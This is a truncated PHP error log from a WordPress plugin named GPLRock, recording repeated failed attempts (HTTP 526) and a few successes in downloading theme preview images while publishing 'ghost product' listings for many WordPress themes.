https://meldwp.com/wp-content/uploads/naturepress---ecology--environment-wordpress-theme-17216.webp [05-Apr-2026 16:43:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: naturepress-ecology-environment-wordpress-theme [05-Apr-2026 16:43:10 UTC] GPLRock: Image download failed for product contempo-dance-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:12 UTC] GPLRock: Image download failed for product contempo-dance-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contempo---dance-school-wordpress-theme-10163.webp for product contempo-dance-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:14 UTC] GPLRock: Image download failed for product contempo-dance-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:16 UTC] GPLRock: Image download failed for product contempo-dance-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contempo---dance-school-wordpress-theme-10163.webp for product contempo-dance-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:18 UTC] GPLRock WARNING: Image download failed for product contempo-dance-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/contempo---dance-school-wordpress-theme-10163.webp [05-Apr-2026 16:43:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contempo-dance-school-wordpress-theme [05-Apr-2026 16:43:18 UTC] GPLRock: Image download failed for product azoom-multi-purpose-theme-with-animation-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:21 UTC] GPLRock: Image download failed for product azoom-multi-purpose-theme-with-animation-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azoom--multi-purpose-theme-with-animation-builder-30401.webp for product azoom-multi-purpose-theme-with-animation-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:23 UTC] GPLRock: Image download failed for product azoom-multi-purpose-theme-with-animation-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:25 UTC] GPLRock: Image download failed for product azoom-multi-purpose-theme-with-animation-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:43:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azoom--multi-purpose-theme-with-animation-builder-30401.webp for product azoom-multi-purpose-theme-with-animation-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:43:27 UTC] GPLRock WARNING: Image download failed for product azoom-multi-purpose-theme-with-animation-builder. URL: https://meldwp.com/wp-content/uploads/azoom--multi-purpose-theme-with-animation-builder-30401.webp [05-Apr-2026 16:43:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: azoom-multi-purpose-theme-with-animation-builder [05-Apr-2026 16:44:00 UTC] GPLRock: Image download failed for product haud-a-creative-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:02 UTC] GPLRock: Image download failed for product haud-a-creative-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haud---a-creative-portfolio-theme-28386.webp for product haud-a-creative-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:04 UTC] GPLRock: Image download failed for product haud-a-creative-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:07 UTC] GPLRock: Image download failed for product haud-a-creative-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haud---a-creative-portfolio-theme-28386.webp for product haud-a-creative-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:09 UTC] GPLRock WARNING: Image download failed for product haud-a-creative-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/haud---a-creative-portfolio-theme-28386.webp [05-Apr-2026 16:44:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: haud-a-creative-portfolio-theme [05-Apr-2026 16:44:09 UTC] GPLRock: Image download failed for product edufast-education-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:11 UTC] GPLRock: Image download failed for product edufast-education-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edufast---education--online-course-wordpress-theme-8182.webp for product edufast-education-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:13 UTC] GPLRock: Image download failed for product edufast-education-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:15 UTC] GPLRock: Image download failed for product edufast-education-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edufast---education--online-course-wordpress-theme-8182.webp for product edufast-education-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:17 UTC] GPLRock WARNING: Image download failed for product edufast-education-online-course-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edufast---education--online-course-wordpress-theme-8182.webp [05-Apr-2026 16:44:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edufast-education-online-course-wordpress-theme [05-Apr-2026 16:44:18 UTC] GPLRock: Image downloaded successfully for product optimax-seo-marketing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-742f39a0.webp [05-Apr-2026 16:44:18 UTC] GPLRock: Using pre-downloaded image for product optimax-seo-marketing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-742f39a0.webp [05-Apr-2026 16:44:18 UTC] GPLRock: Ghost product published with image - Product ID: optimax-seo-marketing-wordpress-theme [05-Apr-2026 16:44:18 UTC] GPLRock: Image download failed for product educatito-multiconcept-education-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:20 UTC] GPLRock: Image download failed for product educatito-multiconcept-education-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educatito--multiconcept-education--courses-wordpress-theme-28388.webp for product educatito-multiconcept-education-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:22 UTC] GPLRock: Image download failed for product educatito-multiconcept-education-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:24 UTC] GPLRock: Image download failed for product educatito-multiconcept-education-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educatito--multiconcept-education--courses-wordpress-theme-28388.webp for product educatito-multiconcept-education-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:26 UTC] GPLRock WARNING: Image download failed for product educatito-multiconcept-education-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/educatito--multiconcept-education--courses-wordpress-theme-28388.webp [05-Apr-2026 16:44:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: educatito-multiconcept-education-courses-wordpress-theme [05-Apr-2026 16:44:26 UTC] GPLRock: Image download failed for product isomorphic-react-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:28 UTC] GPLRock: Image download failed for product isomorphic-react-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/isomorphic---react-admin-dashboard-template-32333.webp for product isomorphic-react-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:31 UTC] GPLRock: Image download failed for product isomorphic-react-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:33 UTC] GPLRock: Image download failed for product isomorphic-react-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/isomorphic---react-admin-dashboard-template-32333.webp for product isomorphic-react-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:35 UTC] GPLRock WARNING: Image download failed for product isomorphic-react-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/isomorphic---react-admin-dashboard-template-32333.webp [05-Apr-2026 16:44:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: isomorphic-react-admin-dashboard-template [05-Apr-2026 16:44:35 UTC] GPLRock: Image download failed for product mitup-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:37 UTC] GPLRock: Image download failed for product mitup-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mitup---event--conference-wordpress-theme-9919.webp for product mitup-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:39 UTC] GPLRock: Image download failed for product mitup-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:41 UTC] GPLRock: Image download failed for product mitup-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mitup---event--conference-wordpress-theme-9919.webp for product mitup-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:44 UTC] GPLRock WARNING: Image download failed for product mitup-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mitup---event--conference-wordpress-theme-9919.webp [05-Apr-2026 16:44:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mitup-event-conference-wordpress-theme [05-Apr-2026 16:44:44 UTC] GPLRock: Image download failed for product nobleui-html-bootstrap-5-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:46 UTC] GPLRock: Image download failed for product nobleui-html-bootstrap-5-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nobleui---html-bootstrap-5-admin-dashboard-template-16107.webp for product nobleui-html-bootstrap-5-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:48 UTC] GPLRock: Image download failed for product nobleui-html-bootstrap-5-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:50 UTC] GPLRock: Image download failed for product nobleui-html-bootstrap-5-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nobleui---html-bootstrap-5-admin-dashboard-template-16107.webp for product nobleui-html-bootstrap-5-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:52 UTC] GPLRock WARNING: Image download failed for product nobleui-html-bootstrap-5-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/nobleui---html-bootstrap-5-admin-dashboard-template-16107.webp [05-Apr-2026 16:44:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nobleui-html-bootstrap-5-admin-dashboard-template [05-Apr-2026 16:44:52 UTC] GPLRock: Image download failed for product indusri-industry-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:55 UTC] GPLRock: Image download failed for product indusri-industry-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/indusri---industry--factory-wordpress-theme-24625.webp for product indusri-industry-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:44:57 UTC] GPLRock: Image download failed for product indusri-industry-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:44:59 UTC] GPLRock: Image download failed for product indusri-industry-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/indusri---industry--factory-wordpress-theme-24625.webp for product indusri-industry-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:01 UTC] GPLRock WARNING: Image download failed for product indusri-industry-factory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/indusri---industry--factory-wordpress-theme-24625.webp [05-Apr-2026 16:45:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: indusri-industry-factory-wordpress-theme [05-Apr-2026 16:45:01 UTC] GPLRock: Image download failed for product harmony-care-private-nursing-home-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:03 UTC] GPLRock: Image download failed for product harmony-care-private-nursing-home-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmony-care---private-nursing-home--senior-care-wordpress-theme-31613.webp for product harmony-care-private-nursing-home-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:05 UTC] GPLRock: Image download failed for product harmony-care-private-nursing-home-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:08 UTC] GPLRock: Image download failed for product harmony-care-private-nursing-home-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmony-care---private-nursing-home--senior-care-wordpress-theme-31613.webp for product harmony-care-private-nursing-home-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:10 UTC] GPLRock WARNING: Image download failed for product harmony-care-private-nursing-home-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/harmony-care---private-nursing-home--senior-care-wordpress-theme-31613.webp [05-Apr-2026 16:45:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: harmony-care-private-nursing-home-senior-care-wordpress-theme [05-Apr-2026 16:45:10 UTC] GPLRock: Image downloaded successfully for product venezia-digital-marketing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-147c2c2c.webp [05-Apr-2026 16:45:10 UTC] GPLRock: Using pre-downloaded image for product venezia-digital-marketing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-147c2c2c.webp [05-Apr-2026 16:45:10 UTC] GPLRock: Ghost product published with image - Product ID: venezia-digital-marketing-wordpress-theme [05-Apr-2026 16:45:38 UTC] GPLRock: Image download failed for product zenspot-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:40 UTC] GPLRock: Image download failed for product zenspot-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenspot---lifestyle-blog-wordpress-theme-13451.webp for product zenspot-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:42 UTC] GPLRock: Image download failed for product zenspot-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:45 UTC] GPLRock: Image download failed for product zenspot-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenspot---lifestyle-blog-wordpress-theme-13451.webp for product zenspot-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:47 UTC] GPLRock WARNING: Image download failed for product zenspot-lifestyle-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zenspot---lifestyle-blog-wordpress-theme-13451.webp [05-Apr-2026 16:45:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zenspot-lifestyle-blog-wordpress-theme [05-Apr-2026 16:45:47 UTC] GPLRock: Image download failed for product prorange-painting-renovation-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:49 UTC] GPLRock: Image download failed for product prorange-painting-renovation-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prorange--painting--renovation-theme-15728.webp for product prorange-painting-renovation-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:51 UTC] GPLRock: Image download failed for product prorange-painting-renovation-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:53 UTC] GPLRock: Image download failed for product prorange-painting-renovation-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prorange--painting--renovation-theme-15728.webp for product prorange-painting-renovation-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:45:55 UTC] GPLRock WARNING: Image download failed for product prorange-painting-renovation-theme. URL: https://meldwp.com/wp-content/uploads/prorange--painting--renovation-theme-15728.webp [05-Apr-2026 16:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prorange-painting-renovation-theme [05-Apr-2026 16:45:56 UTC] GPLRock: Image download failed for product grido-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:45:58 UTC] GPLRock: Image download failed for product grido-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grido---creative-multipurpose-wordpress-theme-11215.webp for product grido-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:00 UTC] GPLRock: Image download failed for product grido-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:02 UTC] GPLRock: Image download failed for product grido-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grido---creative-multipurpose-wordpress-theme-11215.webp for product grido-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:04 UTC] GPLRock WARNING: Image download failed for product grido-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grido---creative-multipurpose-wordpress-theme-11215.webp [05-Apr-2026 16:46:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grido-creative-multipurpose-wordpress-theme [05-Apr-2026 16:46:04 UTC] GPLRock: Image download failed for product dance-studio-wordpress-theme-for-dancing-schools-clubs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:06 UTC] GPLRock: Image download failed for product dance-studio-wordpress-theme-for-dancing-schools-clubs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dance-studio---wordpress-theme-for-dancing-schools--clubs-10789.webp for product dance-studio-wordpress-theme-for-dancing-schools-clubs after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:09 UTC] GPLRock: Image download failed for product dance-studio-wordpress-theme-for-dancing-schools-clubs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:11 UTC] GPLRock: Image download failed for product dance-studio-wordpress-theme-for-dancing-schools-clubs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dance-studio---wordpress-theme-for-dancing-schools--clubs-10789.webp for product dance-studio-wordpress-theme-for-dancing-schools-clubs after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:13 UTC] GPLRock WARNING: Image download failed for product dance-studio-wordpress-theme-for-dancing-schools-clubs. URL: https://meldwp.com/wp-content/uploads/dance-studio---wordpress-theme-for-dancing-schools--clubs-10789.webp [05-Apr-2026 16:46:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dance-studio-wordpress-theme-for-dancing-schools-clubs [05-Apr-2026 16:46:13 UTC] GPLRock: Image download failed for product boomi-environment-ecology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:15 UTC] GPLRock: Image download failed for product boomi-environment-ecology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boomi---environment--ecology-wordpress-theme-19675.webp for product boomi-environment-ecology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:17 UTC] GPLRock: Image download failed for product boomi-environment-ecology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:19 UTC] GPLRock: Image download failed for product boomi-environment-ecology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boomi---environment--ecology-wordpress-theme-19675.webp for product boomi-environment-ecology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:22 UTC] GPLRock WARNING: Image download failed for product boomi-environment-ecology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/boomi---environment--ecology-wordpress-theme-19675.webp [05-Apr-2026 16:46:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boomi-environment-ecology-wordpress-theme [05-Apr-2026 16:46:22 UTC] GPLRock: Image download failed for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:24 UTC] GPLRock: Image download failed for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/labpeak--laboratory--science-research-wordpress-theme--rtl-with-appointments-boo-21205.webp for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:26 UTC] GPLRock: Image download failed for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:28 UTC] GPLRock: Image download failed for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/labpeak--laboratory--science-research-wordpress-theme--rtl-with-appointments-boo-21205.webp for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:30 UTC] GPLRock WARNING: Image download failed for product labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking. URL: https://meldwp.com/wp-content/uploads/labpeak--laboratory--science-research-wordpress-theme--rtl-with-appointments-boo-21205.webp [05-Apr-2026 16:46:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: labpeak-laboratory-science-research-wordpress-theme-rtl-with-appointments-booking [05-Apr-2026 16:46:30 UTC] GPLRock: Image download failed for product corona-medical-pharmacy-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:32 UTC] GPLRock: Image download failed for product corona-medical-pharmacy-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corona--medical-pharmacy-woocommerce-wordpress-theme-10095.webp for product corona-medical-pharmacy-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:35 UTC] GPLRock: Image download failed for product corona-medical-pharmacy-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:37 UTC] GPLRock: Image download failed for product corona-medical-pharmacy-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corona--medical-pharmacy-woocommerce-wordpress-theme-10095.webp for product corona-medical-pharmacy-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:39 UTC] GPLRock WARNING: Image download failed for product corona-medical-pharmacy-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/corona--medical-pharmacy-woocommerce-wordpress-theme-10095.webp [05-Apr-2026 16:46:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corona-medical-pharmacy-woocommerce-wordpress-theme [05-Apr-2026 16:46:39 UTC] GPLRock: Image download failed for product lovegiver-senior-care-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:41 UTC] GPLRock: Image download failed for product lovegiver-senior-care-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovegiver---senior-care-wordpress-theme--rtl-262.webp for product lovegiver-senior-care-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:43 UTC] GPLRock: Image download failed for product lovegiver-senior-care-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:46 UTC] GPLRock: Image download failed for product lovegiver-senior-care-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovegiver---senior-care-wordpress-theme--rtl-262.webp for product lovegiver-senior-care-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:48 UTC] GPLRock WARNING: Image download failed for product lovegiver-senior-care-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/lovegiver---senior-care-wordpress-theme--rtl-262.webp [05-Apr-2026 16:46:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lovegiver-senior-care-wordpress-theme-rtl [05-Apr-2026 16:46:48 UTC] GPLRock: Image download failed for product chicago-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:50 UTC] GPLRock: Image download failed for product chicago-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chicago---restaurant--cafe-wordpress-theme-6990.webp for product chicago-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:52 UTC] GPLRock: Image download failed for product chicago-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:54 UTC] GPLRock: Image download failed for product chicago-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chicago---restaurant--cafe-wordpress-theme-6990.webp for product chicago-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:46:56 UTC] GPLRock WARNING: Image download failed for product chicago-restaurant-cafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chicago---restaurant--cafe-wordpress-theme-6990.webp [05-Apr-2026 16:46:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chicago-restaurant-cafe-wordpress-theme [05-Apr-2026 16:46:56 UTC] GPLRock: Image download failed for product redias-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:46:58 UTC] GPLRock: Image download failed for product 